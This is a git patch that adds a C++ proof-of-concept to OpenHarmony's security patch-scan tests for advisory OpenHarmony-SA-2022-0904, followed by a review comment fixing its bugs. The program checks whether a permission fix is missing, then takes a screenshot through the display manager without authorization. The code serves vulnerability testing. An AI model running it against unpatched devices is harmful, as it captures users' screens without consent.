From 9fe9db0713590d8f45de6ab4e734987d03b59c44 Mon Sep 17 00:00:00 2001
From: lakemoon
Date: Mon, 6 Mar 2023 11:13:09 +0800
Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0904?=
 =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: lakemoon
---
 .../2022-09/OpenHarmony-SA-2022-0904/poc.cpp | 100 ++++++++++++++++++
 1 file changed, 100 insertions(+)
 create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp
diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp
new file mode 100644
index 000000000..ef4fd1b48
--- /dev/null
+++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0904/poc.cpp
@@ -0,0 +1,100 @@
+/*
+ * Copyright (c) 2023 Huawei Device Co., Ltd.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include
+#include
+#include
+#include
+namespace Media {
+ class PixelMap;
+}
+
+int main() {
+ void *handle,*handle2;
+ // 打开共享库libdms.z.so
+ handle2 = dlopen("/system/lib/libdms.z.so", RTLD_LAZY);
+ if (!handle2) {
+ fprintf(stderr, "Error: %s\n", dlerror());
+ return 1;
+ }
+
+ // 获取函数DisplayManagerStub::IsStartByHdcd地址
+ void* IsStartByHdcd= dlsym(handle2, "_ZN4OHOS5Rosen18DisplayManagerStub13IsStartByHdcdEv");
+ if (!IsStartByHdcd) {
+ printf("OpenHarmony-SA-2022-0904: vulnerable!\n");
+ } else {
+ printf("OpenHarmony-SA-2022-0904: not vulnerable!\n");
+ return 1;
+ }
+
+ // 打开共享库libdm.z.so
+ handle = dlopen("/system/lib/libdm.z.so", RTLD_LAZY);
+ if (!handle) {
+ fprintf(stderr, "Error: %s\n", dlerror());
+ return 1;
+ }
+
+ // 获取函数DisplayManager::GetInstance地址
+ typedef void* (*CreateObjFunc)();
+ CreateObjFunc create_obj = reinterpret_cast(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager11GetInstanceEv"));
+ if (create_obj == NULL) {
+ fprintf(stderr, "Error: %s\n", dlerror());
+ dlclose(handle);
+ return 1;
+ }
+ // 创建类实例
+ void* obj = create_obj();
+
+ // 获取函数DisplayManager::GetDefaultDisplayId地址
+ typedef uint64_t (*DisplayId)(void*);
+ DisplayId GetDefaultDisplayId = NULL;
+ GetDefaultDisplayId = reinterpret_cast( dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager19GetDefaultDisplayIdEv"));
+ if (GetDefaultDisplayId == NULL) {
+ fprintf(stderr, "Error: %s\n", dlerror());
+ dlclose(handle);
+ return 1;
+ }
+
+ // 调用函数DisplayManager::GetDefaultDisplayId
+ uint64_t displayId = GetDefaultDisplayId(obj);
+ if (displayId == -1ULL) {
+ printf("GetDefaultDisplayId failed!\n");
+ } else{
+ printf("DisplayId: %llu\n", displayId);
+ }
+
+ // 获取函数DisplayManager::GetScreenshot地址
+ typedef std::shared_ptr (*GetDisplaySnapshot)(void*,uint64_t);
+ GetDisplaySnapshot GetPixelMap = nullptr;
+ GetPixelMap = reinterpret_cast(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager13GetScreenshotEy"));
+ if (GetPixelMap == NULL) {
+ fprintf(stderr, "Error: %s\n", dlerror());
+ dlclose(handle);
+ return 1;
+ }
+ // 调用函数DisplayManager::GetScreenshot
+ void* PixelMap = nullptr;
+ PixelMap = GetPixelMap(obj,displayId).get();
+ if (PixelMap == nullptr) {
+ printf("GetDefaultDisplayId failed!\n");
+ } else{
+ printf("PixelMap: %p\n", PixelMap);
+ }
+
+ // 关闭共享库
+
+
+ return 0;
+}
\ No newline at end of file
--
GitLab
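Review bot: The trailing `// 关闭共享库` comment in main() has no code under it, so neither `handle` nor `handle2` is ever passed to `dlclose()` on the success path (and `handle2` is not released on any of the later error returns either); harmless at process exit, but the comment promises a close that never happens. A few lines above, `PixelMap = GetPixelMap(obj,displayId).get();` pulls a raw pointer out of a temporary `std::shared_ptr` that is destroyed at the end of that statement, so `PixelMap` already dangles when it reaches the null check and the `%p` print — keep the `shared_ptr` in a local for as long as the pointer is used. That branch's failure message also reads `GetDefaultDisplayId failed!`, a copy of the earlier message, where `GetScreenshot failed!` is meant. Separately, `printf("DisplayId: %llu\n", displayId)` formats a `uint64_t` with `%llu`, which is only correct where `uint64_t` is `unsigned long long`; `PRIu64` from `<cinttypes>` is the portable spelling.
```cpp
    // … unchanged: dlopen/dlsym setup, GetDefaultDisplayId call …

    // 调用函数DisplayManager::GetScreenshot
    auto pixelMap = GetPixelMap(obj, displayId); // owner stays alive while the raw pointer is used
    if (pixelMap == nullptr) {
        printf("GetScreenshot failed!\n");
    } else {
        printf("PixelMap: %p\n", static_cast<void*>(pixelMap.get()));
    }

    // 关闭共享库
    dlclose(handle);
    dlclose(handle2);
    return 0;
```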